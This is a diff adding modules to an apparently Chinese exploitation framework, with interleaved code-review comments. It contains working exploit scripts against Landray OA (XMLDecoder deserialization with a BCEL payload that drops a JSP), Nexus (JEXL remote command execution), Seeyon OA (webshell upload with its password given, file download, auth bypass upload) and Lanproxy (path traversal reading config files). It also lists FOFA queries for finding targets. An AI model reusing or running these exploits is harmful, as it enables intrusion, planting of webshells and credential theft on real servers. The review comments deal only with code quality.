a$80$f0C$b4c$QE$M$7b$91$z$93$cf$S2$98$a4$dd$a0$5d$J$84$f1$F1$_R$94$_0M$3a$ac$Qn$86l$ad$c43L$7f$H$e6$u$f6$y$v$f4$92l$7e$S$91$eb$d2$f2$H$8e$F$bc$o$V$f0$95$t$e2$fc_$3f$bb$d2$b6$3e$I$A$A +``` + +# 3、poc + +payload需要手工单独生成。 + +poc配合框架可批量。 \ No newline at end of file diff --git a/Moudle/Landray/Landray_OA_xmldecoder_getshell.py b/Moudle/Landray/Landray_OA_xmldecoder_getshell.py new file mode 100644 index 0000000..3c2ec91 --- /dev/null +++ b/Moudle/Landray/Landray_OA_xmldecoder_getshell.py 
@@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='Landray_OA_xmldecoder_getshell' +AUTHOR="境心" +REMARK='蓝凌OA xmldecoder 反序列化漏洞' +FOFA_RULE='app="Landray-OA系统"' +###################################################### + + +def poc(target): + result = {} + target_url = target+"/sys/ui/extend/varkind/custom.jsp" + headers = { + "User-Agent": ua, + "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn", + "Accept-Encoding": "gzip, deflate", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1", + "Content-Type": "application/x-www-form-urlencoded" + } + data = {"var": "{\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}", + "fdParemNames": "11", + "fdParameters": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$dbV$dbF$U$dd$D62B$E0$98KHI$934$N$Q$c0$N$974$e5$da$d8$60c0$E0$d8$b1iKeY$d8rdI$95d$Ci$ff$a7$cfy1$5de$ad$7e$40$7f$a8o$5d$3d$psu$dd$8b$d7$d2$5c$ce$ec$d9$3ag$9f$99$p$ff$fe$e7$af$bf$B$98$c5O$o$kbA$c0$a2$88$W$y$88X$c22oV$C$f8Z$c4kDDD$b1$wb$N1$Rq$ac$8bH$60C$c0$a6$80$a4$88N$y$E$b0$rb$Q$db$7c$f2$s$80$j$de$ef$8a$90$b0$X$40J$c0$be$88$7e$ce$7e$c0$fbt$A$Z$O$7e$cb$d7$b3$bc$c9$J8$U$f0$NC$db$a2fh$ee2C$eb$e8X$9a$c1$X5$L$wCWR3$d4$edj$r$af$da$fbr$5e$tK0i$w$b2$9e$96m$8d$cf$_$8d$3e$b7$a49$MO$93$8e$ad$84$x$b2f$84$cb$f2$89$ivU$c7$N$c7d$c7$ddpLcM$v$99$91$e8Zr$81A$5c$3bUT$cb$d5L$836$f98$9e$a1$7f$f40$e9m$d2e$a3$YN$b9$b6f$U$X$3cOd$bbH$b0$de$s$cb$M$81EE$bf$f2$5b$d1$J$d6s$L$V$d5e$c7$n$90$cf$92$dd$S$f7$bc$J$81d$d1$c0$cd$d8$9a$ab$da$d3$M$a1$3aF3$c3$3b7v$82$f9$9d$92$aa$eb$MBAUH$Y$9ba0$e9T$8dpEs$94p$e4uj$ed$e5$ecj$7d$85s$d6A$f5w0t$a6$5cYy$b7$r$5b$9eX$a47$J$902$ab$b6$a2$c64$$$5e$a8Q$a1$v$ee$83$84O$f1$88$e1$c9$ffPT$c0$b7$S$be$c3$91$84$ef$nS$ce$f2Ni$wa$90$e3$96$adR$x$m$_AAA$80$w$e1$YE$B$r$J$g$ca$C$deI$d0Q$R$60H0a$91$c6M$82g$Yh$94$zR$d5tO$D$n$b3$W$99Ll$c7$q$fc$A$5b$82$D$97$e1$9en$W5$e3$88$3b$3aUv$y$JUX$3c$96$T$Gw$t$9a$3e$v$bc$dd$ad$w$eb$hV$de$d8s$f2ZQ$x$c4K$96r$W$e1O$v$R$cf$9d$c9$99t5$X$3f$9dK$ac$ef$e9$ca$cc$ae$93$88E$9c$5c$s$f6$n$97$8a$94$e5x$ba$y$T$$_$d9$z$w$95$f4$fblF$3fK$ac$e7$5e$e4$e3s$baR$89ir$e6$d4$w$c4u$5d9$9b$d56$f7$j$7d$a7$b8$b4D$t$aby$a2$Y$ba$h$D$93$f0$k$a7$94$ec$83$fd$d8$e4$x$ee$f4$99$84$P8$91$f0$pOE$ef$N$fc$fa$fc$de$ny$93$_$ab$8a$7b$c7$b4_$b2U$b9$40g$40$a9$da$b6j$b8W$f3$be$d1$b1d$p$8aNN$a8$a8$baQ$93Rw$eaz$877i$ca$9e$a7Cw$e0$b7$96$f8$9e$a6$L$M$ed$3a$N$3c$L$5d$cc$d1$sw$ab$c9M$e9j0Q$d0$e4$d1$8em$ba$U$Y$85$bbj$d6$_$eb$e3$x$7f$i$95$C$d3$dc$b3p$p$86$c8F$fe$jA$a2x$d1$d2E$f1$$$D$c3$83$bf$b1$de$ac$S$df$e0$3f$ad1t$Q$T$afK$97$v$b9$e21T7$7c$b0$c7$x$8et$7bN$H$97G$e5$V$85$bb$89$b8$$$L$7e$c7$d25J$e5$b3f$c25$adDm$b2e$a9$G$a5v$f2$3f$b4$bes$87x$Js$cd$abJ$Rj$b65$7d$5dP$o$d5$e3c$9e$d9$fe$a6NE$e8$a6$8e$kF$9a3$I$5e$99$d3I$i$bf$a2$9b$8e$8aG$f4$ady$I$fek$F$e3$a5$86$e6$8fi6C3F$bd$
7f$fc$i$ec$p$NZ$f0$84Z$fei$C$E$f8$Q$c0g4$92$ea$m$3c$c5$e7$d4$3f$a3$c7G$96$R$b4c$Uc$97T_R$cfQ$ed$Xh$c9$9e$a35$d3H$d7Ad$d2$z$bav$8c$e3$f9$j$ba$A$s$c83$c6$e9X$x$bd$ae$8dVJ$bf$c0W$83$3f$d8V$83$b09$5eC$a0$86$f6$g$c4$g$3a$92$X$90$b2$X$e8$a4$97$dd$7b$k$ec$aa$a1$bbu$ba$86$9e$60$90$9a$gz$cf$d1$b7$V$Mm_$a0$9f$A$D$f3$be$L$Mf$87$7c$935$M$F$ef$9fcx$de$3f1$e4$af$e1$c1D$N$9f$fc$M$df$e6G$cf$t$85$w$e6$Ii$c4$bd$9e$o$8f$81n$f2$b6$H$f7$R$c4$oz$b1$82$3e$ac$p$84$y$7d$5d$8f0$40$f8$n$da1$88$o$86$bd$c8$96$c9g$J$ZL$d2n$d0$ae$E$c2$f8$82$98$X$v$ca$X$98$s$jV$I7C$b6V$e2$Z$a6$bf$Ds$U$7b$96$UzI6$3f$89$c8ui$f9$D$c7$C$5e$91$K$f8$ca$Tq$fe$_$99$bd$a4$e2$3e$I$A$A\r\n"} + requests.post(target_url, headers=headers, data=data, timeout=5, verify=False) + poc_url = target+"/login_test.jsp" + res = requests.get(poc_url, timeout=5, verify=False) + + if res.status_code == 200 and "this is a friendly test" in res.text: + result['poc'] = NAME + result['poc_url'] = poc_url + return result + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Landray/image-20210913144734740.png b/Moudle/Landray/image-20210913144734740.png new file mode 100644 index 0000000..e100df0 Binary files /dev/null and b/Moudle/Landray/image-20210913144734740.png differ diff --git a/Moudle/Lanproxy/CVE_2021_3019.py b/Moudle/Lanproxy/CVE_2021_3019.py new file mode 100644 index 0000000..1d4d683 --- /dev/null +++ b/Moudle/Lanproxy/CVE_2021_3019.py 
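Review bot: `poc()` is not a read-only probe: the first request is built so that the target writes `login_test.jsp` into its web root and the second request only confirms that file is served, yet neither REMARK nor a docstring says so and nothing removes the artifact afterwards. Add a module docstring along the lines of `"""Verification leaves /login_test.jsp on the target; remove it manually after testing."""` and reflect that in REMARK so operators of the framework know this check is intrusive. The `fdParameters` value ends in a literal `\r\n`, which looks like the raw request's line terminator copied into the form field rather than part of the payload — confirm it is intended. As in Jeecms_ssrf_getshell.py, the two `requests` calls have no exception handling, so a timeout propagates out of `poc()`.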
@@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2021-3019' +AUTHOR="Joker" +REMARK='Lanproxy 目录遍历漏洞 ' +FOFA_RULE='header= "Server: LPS-0.1"' +###################################################### + +def poc(target): + result={} + vuln_url = target + "/..%2Fconf/config.properties" + + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6", + "Upgrade-Insecure-Requests": "1" + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if "config.server" in r.text and r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['data'] = str(r.text) + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Moudle_index.py b/Moudle/Moudle_index.py new file mode 100644 index 0000000..3fba909 --- /dev/null +++ b/Moudle/Moudle_index.py 
@@ -0,0 +1,110 @@ +MOUDLE_NUM=26 +PAYLOAD_NUM=55 + +# AlibabaCanal +from Moudle.AlibabaCanal import Alibaba_Canal_Info_Leak + +# Apache +from Moudle.Apache import CVE_2021_41773 + +# Confluence +from Moudle.Confluence import CVE_2021_26084 + +# Demo +from Moudle.Demo import Demo +from Moudle.Demo import Test + +# Discuz +from Moudle.Discuz import discuz_version_change_getshell + +# Drupal +from Moudle.Drupal import CVE_2018_7600 + +# ESAFENET +from Moudle.ESAFENET import CNVD_2021_26058 + +# EyouCMS +from Moudle.EyouCMS import EyouCMS_qiantai_rce + +# F5 +from Moudle.F5 import CVE_2020_5902 +from Moudle.F5 import CVE_2021_22986 + +# Fikker +from Moudle.Fikker import Fikker_admin + +# Inspur +from Moudle.Inspur import Inspur_Any_user_login +from Moudle.Inspur import CVE_2020_21224 +from Moudle.Inspur import Inspur_sysShell_RCE + +# Jeecms +from Moudle.Jeecms import Jeecms_ssrf_getshell + +# Kangle +from Moudle.Kangle import Kangle_Console_default_password + +# Landray +from Moudle.Landray import Landray_OA_anyfile_read +from Moudle.Landray import Landray_OA_xmldecoder_getshell + +# Lanproxy +from Moudle.Lanproxy import CVE_2021_3019 + +# Nexus +from Moudle.Nexus import CVE_2019_7238 + +# Seeyon +from Moudle.Seeyon import CNVD_2019_19299 +from Moudle.Seeyon import CNVD_2020_62422 +from Moudle.Seeyon import CNVD_2021_01627 +from Moudle.Seeyon import Information_seeyou +from Moudle.Seeyon import Seeyon_OA_SessionLeak_Upload +from Moudle.Seeyon import Seeyon_OA_Session_Leak +from Moudle.Seeyon import Seeyon_OA_SQLInjection + +# SonarQube +from Moudle.SonarQube import CVE_2020_27986 + +# Spring +from Moudle.Spring import CVE_2022_22947 + +# TDXK +from Moudle.TDXK import TDXK_Any_file_upload +from Moudle.TDXK import TDXK_Any_user_login +from Moudle.TDXK import TDXK_logined_any_file_upload +from Moudle.TDXK import TDXK_online_user_login +from Moudle.TDXK import TDXK_weakpwd + +# TianQing +from Moudle.TianQing import TianQing_SQLinjection +from Moudle.TianQing import 
TianQing_Unauthorized + +# VCenter +from Moudle.VCenter import CVE_2021_21972 +from Moudle.VCenter import CVE_2021_22005 + +# VRealize +from Moudle.VRealize import CVE_2021_21975 +from Moudle.VRealize import CVE_2021_21983 + +# Weaver +from Moudle.Weaver import CNVD_2019_32204 +from Moudle.Weaver import Weaver_e_Bridge_file_read +from Moudle.Weaver import Weaver_e_Cology_RCE +from Moudle.Weaver import Weaver_e_cology_v9_file_upload +from Moudle.Weaver import Weaver_OA_V8_sqlinjection + +# Weblogic +from Moudle.Weblogic import CVE_2014_4210 +from Moudle.Weblogic import CVE_2017_10271 +from Moudle.Weblogic import CVE_2018_2894 +from Moudle.Weblogic import CVE_2019_2725 +from Moudle.Weblogic import CVE_2020_16882 +from Moudle.Weblogic import CVE_2021_2109 +from Moudle.Weblogic import Weblogic_Console_Info_Leak + +# Zabbix +from Moudle.Zabbix import CVE_2016_10134 +from Moudle.Zabbix import Zabbix_Console_default_password + diff --git a/Moudle/Nexus/CVE_2019_7238.py b/Moudle/Nexus/CVE_2019_7238.py new file mode 100644 index 0000000..64e5d49 --- /dev/null +++ b/Moudle/Nexus/CVE_2019_7238.py 
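Review bot: `MOUDLE_NUM=26` and `PAYLOAD_NUM=55` at the top are hand-maintained counts of the import list that follows, so every new module must be added in three places and the banner values silently drift when one is forgotten. They do match the 26 package groups and 55 imports present in this hunk, but nothing checks that. Derive them from the list instead (for example collect the imported modules in a tuple and set `PAYLOAD_NUM = len(PAYLOADS)`), or at minimum add `# keep in sync with the imports below` next to both constants.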
@@ -0,0 +1,69 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 + +requests.packages.urllib3.disable_warnings() + + +# 脚本信息 +###################################################### +NAME='CVE-2019-7238' +AUTHOR="RabbitMask" +REMARK='Nexus RCE' +FOFA_RULE='app="Nexus-Repository-Manager"' +###################################################### + +def poc(target): + result={} + cmd = 'whoami' + if target[-1] == '/': + vuln_url = target + "service/extdirect" + else: + vuln_url = target + "/service/extdirect" + + headers = { + 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0", + 'Accept': "*/*", + 'Content-Type': "application/json", + 'X-Requested-With': "XMLHttpRequest", + 'Content-Length': "7244", + 'Connection': "close", + 'Cache-Control': "no-cache" + } + + payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n y,\\n 'Exploit.Test234',\\n z.getBytes('latin1'), 0,\\n 3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, 
{\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" % cmd + r = requests.post(vuln_url, data=payload, headers=headers, verify=False) + if r.status_code == 200 and len(r.text) < 100 and len(r.text) > 0: + result['target'] = target + result['poc'] = NAME + result['whoami'] = r.text + return result + + +def exp(target,cmd): + if target[-1] == '/': + vuln_url = target + "service/extdirect" + else: + vuln_url = target + "/service/extdirect" + + headers = { + 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0", + 'Accept': "*/*", + 'Content-Type': "application/json", + 'X-Requested-With': "XMLHttpRequest", + 'Content-Length': "7244", + 'Connection': "close", + 'Cache-Control': "no-cache" + } + + payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n y,\\n 'Exploit.Test234',\\n z.getBytes('latin1'), 0,\\n 3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], 
\"method\": \"previewAssets\"}" % cmd + r = requests.post(vuln_url, data=payload, headers=headers, verify=False) + if r.status_code == 200: + print(r.text) + + +if __name__ == '__main__': + # exp() + pass \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2019_19299.py b/Moudle/Seeyon/CNVD_2019_19299.py new file mode 100644 index 0000000..61803a2 --- /dev/null +++ b/Moudle/Seeyon/CNVD_2019_19299.py 
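Review bot: Neither `requests.post` call in `poc()` or `exp()` passes a `timeout`, so a single unresponsive host blocks the scan indefinitely; the other modules use `timeout=5` and this one should too. `poc()` and `exp()` duplicate the URL normalisation, the header dict and the long payload template almost byte for byte, differing only in what they do with the response, so factor the shared part into a private `_send(target, cmd)` helper that returns the response. The hard-coded `'Content-Length': "7244"` header is misleading because requests derives the length from the body it actually sends (and, as far as I recall, overwrites a caller-supplied value), so drop it. The `if __name__` block holds a commented-out `# exp()` and a `pass`; delete the dead line.
```python
def _send(target, cmd):
    """POST the previewAssets request for *cmd* and return the response."""
    vuln_url = target + ("service/extdirect" if target.endswith('/') else "/service/extdirect")
    # … unchanged: headers dict (without the hard-coded Content-Length) …
    # … unchanged: payload template, formatted with cmd …
    return requests.post(vuln_url, data=payload, headers=headers, verify=False, timeout=5)


def poc(target):
    result = {}
    r = _send(target, 'whoami')
    if r.status_code == 200 and 0 < len(r.text) < 100:
        result['target'] = target
        result['poc'] = NAME
        result['whoami'] = r.text
        return result


def exp(target, cmd):
    r = _send(target, cmd)
    if r.status_code == 200:
        print(r.text)
```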
@@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +import base64 +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD-2019-19299' +AUTHOR="Joker" +REMARK='致远OA A8 htmlofficeservlet RCE ' +FOFA_RULE='title="致远A8-V5协同管理软件 V6.1sp1"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/seeyon/htmlofficeservlet" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if r.status_code==200 and 'htmoffice' in r.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target): + print('[#]开始写入webshell') + vuln_url= target + "/seeyon/htmlofficeservlet" + payload="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" + data = base64.b64decode(payload) + headers = { + "User-Agent": ua, + "Content-Type": "application/x-www-form-urlencoded", + } + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5) + if r.status_code==500 and '"message":null' in r.text: + print('[+]成功写入webshell') + print('[+]默认冰蝎Webshell地址(szxsd):' + target + '/seeyon/Faltform.jsp') + else: + print('写入webshell失败!') + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2020_62422.py b/Moudle/Seeyon/CNVD_2020_62422.py new file mode 100644 index 0000000..cc3434a --- /dev/null +++ b/Moudle/Seeyon/CNVD_2020_62422.py 
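Review bot: `import sys` is unused in this module (CNVD_2021_01627.py has the same unused import), and `ua` is imported but only used by `exp()` while `poc()` hard-codes its own User-Agent string; use the shared `ua` in both so the framework's UA is configured in one place. The `payload` in `exp()` is an opaque base64 blob with no comment on what it makes the target write, although the success message names `/seeyon/Faltform.jsp`; a one-line comment such as `# drops /seeyon/Faltform.jsp on the target` lets reviewers judge how intrusive `exp()` is without decoding it.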
@@ -0,0 +1,30 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua, headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD_2020_62422' +AUTHOR="Joker" +REMARK='致远OA webmail.do任意文件下载检测' +FOFA_RULE='title="致远' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if 'workflow.dialect' in r.text and r.status_code==200: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +if __name__ == '__main__': + poc('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Seeyon/CNVD_2021_01627.py b/Moudle/Seeyon/CNVD_2021_01627.py new file mode 100644 index 0000000..50331c6 --- /dev/null +++ b/Moudle/Seeyon/CNVD_2021_01627.py 
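Review bot: `FOFA_RULE='title="致远'` is missing the closing double quote inside the query, so the rule is malformed compared with `FOFA_RULE='title="致远"'` in CNVD_2021_01627.py; fix it to `FOFA_RULE='title="致远"'`. `NAME='CNVD_2020_62422'` uses underscores where every other advisory-named module uses hyphens (`'CNVD-2019-19299'`, `'CVE-2021-3019'`), which matters if results are grouped or reported by NAME; use `NAME='CNVD-2020-62422'`. `ua` is imported but unused — only `headers` is.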
@@ -0,0 +1,50 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CNVD-2021-01627' +AUTHOR="Joker" +REMARK='致远OA ajax.do登录绕过 任意文件上传' +FOFA_RULE='title="致远"' +###################################################### + +def poc(target): + result = {} + test_url1 = target + "/seeyon/thirdpartyController.do.css/..;/ajax.do" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=test_url1, headers=headers, verify=False, timeout=5) + if 'java.lang.NullPointerException:null' in r.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target): + print('\033[32m[#]开始写入webshell') + test_url2 = target + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip" + headers={ + "User-Agent": ua, + "Content-Type": "application/x-www-form-urlencoded", + } + 
data="managerMethod=validate&arguments=%1F%C2%8B%08%00%C3%9F%C2%8B%C3%B6%60%00%C3%BFuT%5Bs%C2%AA%C3%88%13%7F%C3%9FOa%C3%B9bR9k%10%C3%A4%18%C3%BF%C2%A7%C3%B6%21%5E%40D%C2%89%C2%82r%C3%BB%C3%97%3E%C3%80%0C%C3%A1%C3%A2%0C%C2%B0%0E%20c%C3%AA%7C%C3%B73%C2%80%C2%A9%C3%A4%C3%94fy%C2%99%C2%9E%C2%A6%C3%BB7%C3%9D%C2%BF%C2%BE%C3%BC%C3%BFm%C3%B0%C2%9A%C2%9Dq%C2%89%C2%BC%03%C3%8D%C2%83%C3%81%C3%BFz%C2%A3o%C2%BDw%C2%8D%C3%A6%C3%A1F3%28%02R%0C%3E%C3%94%C3%8B%3A%3F%07%C2%84%C3%84Y%C3%9A%C3%BC4%C2%8As%C2%9C%C2%86%C2%BD%C3%9C%2B%C2%A2%C3%9E%5F%C2%BD%C3%BEp%C3%B8x%09%7C%2F%C3%8F%C3%89%23%09%02%C2%9A%C2%A5%C2%8F%C3%BD%1F%7F%C3%B4n%5F%C3%A2U%C3%9E0%C3%8E%C2%86%3B%C3%A6RX%C3%A7%C2%B8%08%C3%8E%C2%BD%C3%BCC%C3%A6%19%40%1A%5C%C2%BE2%C2%BBk%C3%B0%1F%C3%BA%C2%92%C2%87%C2%8A%26%C2%8AaB%C3%B2%C2%BA%7F%C3%BF%C2%81%7C%C2%8B%C2%82D%01BM%18%3B9%C2%BF%C2%82EN%7D%7E%C3%8A%29%C2%AB%C2%A8%C3%B0e%C3%B1%C3%BA%C2%82%1B%1D%17%7B%2B%C2%9D%03%C2%8B%C2%AC%C3%9A%C3%B0y%04%C3%B1%C2%B2%04%C2%82Yn%C2%B0V%C3%B9%C3%86T%3D%C2%8E%C2%9E%C2%AB%C2%A3%2C%C2%A5%C2%AE%C2%A1%C2%84%10%C2%9B%14%C3%B0%C2%A8%C3%B2%13%2E%C3%9E%1Ac%C2%AA%24%C3%A3%27%2F%C3%95%2E%2FX%C3%8F%016%13%28%23%C3%9E5%C3%84%C2%8BcA%C2%A4%C3%88%C2%A8%00%C3%B2%C2%94%C3%82%06%1FK%C2%BCc%C2%88%23%C3%B6%C2%9Fl%C3%A2%C2%8C%C2%B4w%3B%2C%1Da%2D%C2%82%C2%95%5E%7D%C2%A9c%C2%B8%C2%AE%C2%B5%2D%C3%95X%C2%A9vI%C3%BD%0F%10%C2%9E%C2%BF%C2%BB%C2%B2%C2%99%C3%B8%C2%B2D%1D%5B%C3%8F%7D%7E%C3%BC%C2%A0%C3%88%1Aql%C3%AD%C2%AAH%C3%87%C3%90%C2%B5%23%C3%8E%C2%B5%C3%84%13%C2%A0%C2%B3%05%C2%B3%C2%B9%02%C2%AE%C2%AE%1CKG%20%2DLu%C3%99%C3%99%1D%C3%A4i%C3%840%C2%A8%22o%C3%B3%40%C3%90F%C2%80%C3%89%2A%C2%93%5F%C2%84%C3%91%05Zk%C3%A2Y%C3%9Bp%C3%8F%C3%97%11%10%C2%B6%C2%A1K%C2%A38%C2%B0u%C2%A4H%05tb4a%C3%B9q%C3%90%5E%C2%97%C3%8A%C2%AA%C3%B3%C3%9B%60%1D%C2%B9%18%C2%95%C3%AE%C2%B1%C3%83Ve%C2%85l%C3%A7u%C2%BC%C3%815%C3%B21%C3%A4%C2%BC%C3%B9i%C3%B2jsO%C2%8C%C3%93%C2%86%C3%B7%C2%93k5v%C3%AB%C2%88q%C3%80%C3%B8%C2%BB%C3%B1%C2%96j%09%C3%80%C3%A8%02%C3%A5%1A%C3%81%C2%85x%C2%80%C2%ABu%C3%AEc%10zW%C3%86%2
F%C2%BF%15%C2%B5D%C3%82%C3%9A%02%C2%9D4%C3%8B%C2%8D%5E%0En%C2%A2%19%C3%8A%04%C3%B0%C3%A6%C2%B5%C2%ADA%2C%5E%C2%A0%C2%AD%5B%C2%8EU%C2%8F%5C%23%C2%8C%C2%A1%C2%A1%10%C2%8F%C2%9E%26%7B%1E%5D%C2%BC%2E%C3%87%C3%A9%C2%BB%C2%BC%C3%81%10%C3%81%25bu%C3%95%23%1FkH%C2%9D%C2%AFg%C2%BA%C2%B9%C2%8D%C3%95C%C2%91lX%0E%C2%9E%C2%BD%C3%8F%C2%B6q%5D%C2%BA6%08%C2%8F%C2%BC%C3%89b29%C2%837%C3%85%C2%A30C%0E%0D%C2%B3Oo%C2%A6%C3%AE%C3%AFo%C3%A6%2AUb%C3%95h%C3%B5%C3%B3%C2%86%2F%40%C3%83%7C%C3%B3%C2%8Eo%C2%9C%26%3E6%05V%C2%9F%0C%C3%8AQ%0Ehk%C3%97%C3%95%C2%A7%C2%B1k%C3%A3%C3%BA%C2%BD6%C3%AA%C3%BC%C3%84%C3%B4%20s%C2%A8x%C3%B29%C2%97%C3%B1%21%11U%16%11%C2%A4%C2%B3%2B%C2%B4%C3%86%C2%A5o%C2%A1%2B%C3%BB7%C3%9F%C2%9B%C2%9A%C2%A4%25%C3%BA%C2%92%C3%B1Z%C3%9D%C3%BC%C3%8A%C2%B6%3Fx%1D%C3%ADS%13%C2%BB%C2%ACW%C3%95%C3%95%1A%01%C3%9BD%40%C3%98%C2%97%2EorGl%C2%BE%C2%BFQ%C2%B2%1C%23%C2%97%0D%C2%AE%C2%8F%C2%8F%19%C2%8B3g9%C2%B0%C3%BC%C3%A1%C3%9AO5%C3%8E%C2%B1%C3%84%C2%84%C3%A5%C3%87%C3%A20khI%04%C3%90%C2%A8%C3%AD%C3%A9%3D%3F%2D%C2%A1l%C2%8E%21%C2%AB%C3%ADn%3Em%7B%12%C3%B0%1A%C3%B5%C3%AC%19%C3%A7%C3%8B%26%C2%B7K%2EUW%C3%97u%C3%A5%0B%C3%BB%C2%87O%C2%83N%C3%8At%C2%88c%02%C2%86%C2%B3gc%C3%B9%7D%C2%BC%08%40%06%C3%99%C2%AC%C3%83%C3%9B%C3%99%C2%8D%C3%B9%C3%97Fw%C3%BF%C2%9E%C3%AA%C3%8E%C3%ADv%C3%A9%7C%C2%BB%C3%8B%C3%9D%0Dp%C3%98%C2%9D%C2%B3%C3%B2%C3%B5%C2%95%01%C2%B4K%C3%A0%C3%BE%5B%C3%BFx%C2%90%C3%BE%7C%C3%BA%C2%BC%24%3E%C2%AF%C2%9Aa%7BA%C3%A9%0D%C2%A2%C3%83%C3%BB%2F%5B%C2%802%12%C2%B0%C3%80%7E%C3%BEhV%21%13%60%C3%B0%C3%9A%23%C2%85W%C3%84%C2%A0W%C3%97%C3%B5%C3%9D%C3%BD%C3%9B%C3%A0%27%C3%9B%C2%8FlG%C2%BE5gq%2E%C2%83%C3%81%C3%9F%C2%BF%00%26%C2%ABR%C3%89Z%05%00%00" + r = requests.post(url=test_url2,headers=headers,data=data,verify=False,timeout=5) + 